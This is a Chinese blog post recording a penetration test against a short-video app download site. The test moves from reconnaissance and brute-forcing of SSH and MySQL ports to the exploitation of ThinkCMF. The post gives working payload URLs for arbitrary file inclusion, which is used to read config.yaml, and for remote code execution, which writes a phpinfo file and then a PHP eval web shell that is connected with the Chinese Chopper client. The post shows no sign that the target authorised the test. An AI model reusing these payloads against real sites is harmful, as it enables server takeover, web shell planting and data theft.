blogger

柠阿乐の博客

于是,我为之努力
记一次对目标站信息搜集,并通杀ThinkCMF系统的渗透测试记录

目标站点是一个短视频App下载页面,下面记录一下渗透过程。

信息搜集过程

首先看云悉,收集指纹和资产,也没发现什么可利用的玩意

然后看shodan发现22和3306都是可以利用的,经过一番爆破,无果

寻思微步反查一下域名打算从别的域名下手,也没果,貌似被隐藏了

之后我发现了一个奇怪的玩意,是别的开发系统中都没有的

凭借之前的渗透测试经验和刚刚右下角

发现是是基于ThinkPHP二次开发的ThinkCMF

0x01 thinkcmf 任意文件包含

信息搜集后确定为ThinkCMF,尝试代码执行。
?a=display&templateFile=README.md

返回报错

这里很明显可以确定payload被执行,但是未找到README.md,因为这是一个默认的git介绍页面,被删除是很正常的。

尝试读取config.yaml配置文件
?a=display&templateFile=config.yaml


成功读取config.yaml文件

0x02 thinkcmf rce

写入phpinfo()
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>

回显未报错

访问写入的test.php文件,成功返回phpinfo()

尝试写入php一句话
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('h4ck.php','<?php eval($_POST["h4ck"]);?>')</php>

菜刀连接写入的一句话

评论(0)

© 2018  柠阿乐の博客  · emlog

蜀ICP备19013579号-柠阿乐   Design by 柠阿乐